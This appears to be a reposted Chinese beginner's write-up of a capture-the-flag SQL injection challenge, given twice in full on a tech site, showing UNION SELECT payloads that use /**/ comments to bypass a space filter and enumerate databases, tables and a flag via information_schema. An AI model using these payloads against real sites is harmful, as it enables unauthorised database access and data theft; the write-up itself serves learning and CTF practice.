• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    分享一个简单的sql注入

    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到sql注入攻击。

    分别输入1,2,3有对应的结果

    使用'会报错,于是

    构造常用的sql语句:1' and '1'='1

    没有反应试一试1' and '1'='2

    还是没反应,工具提示,应该是过滤了什么,改一下sql语句试一试

    1and1=1

    可以显示东西,经过判断过滤了空格,我们使用/**/来代替空格

    试一试1'/**/and/**/'1'='1

    发现有结果了:

    于是构建sql语句:

    判断有那些数据库:

    1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

    可以看到结果:

    查看有哪些数据表:

    1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

    发现了flag的表,我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

    故:

    1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

    本人也是初学者,参考了许多大佬的wp 自己写出来后有什么错误的地方,希望大家指出,谢谢!

    根据页面提示,到底过滤了什么东西?可以知道一定过滤了什么....

    分别输入1,2,3有对应的结果

    使用'会报错,于是

    构造常用的sql语句:1' and '1'='1

    没有反应试一试1' and '1'='2

    还是没反应,工具提示,应该是过滤了什么,改一下sql语句试一试

    1and1=1

    可以显示东西,经过判断过滤了空格,我们使用/**/来代替空格

    试一试1'/**/and/**/'1'='1

    发现有结果了:

    于是构建sql语句:

    判断有那些数据库:

    1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

    可以看到结果:

    查看有哪些数据表:

    1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

    发现了flag的表,我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

    故:

    1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

    总结

    以上所述是小编给大家介绍的一个简单的sql注入,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对脚本之家网站的支持!

    您可能感兴趣的文章:
    • Java面试题解析之判断以及防止SQL注入
    • SQL注入原理与解决方法代码示例
    • 通过ibatis解决sql注入问题
    • Win2003服务器防SQL注入神器--D盾_IIS防火墙
    • Sql注入工具_动力节点Java学院整理
    • Sql注入原理简介_动力节点Java学院整理
    • 寻找sql注入的网站的方法(必看)
    • Mybatis防止sql注入的实例
    • Hibernate使用中防止SQL注入的几种方案
    • 有效防止SQL注入的5种方法总结
    • 关于SQL注入中文件读写的方法总结
    • 深入了解SQL注入
    上一篇:SQL Server 性能调优之查询从20秒至2秒的处理方法
    下一篇:SQL Server学习笔记之事务、锁定、阻塞、死锁用法详解
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    分享一个简单的sql注入 分享,一个,简单,的,sql,注入,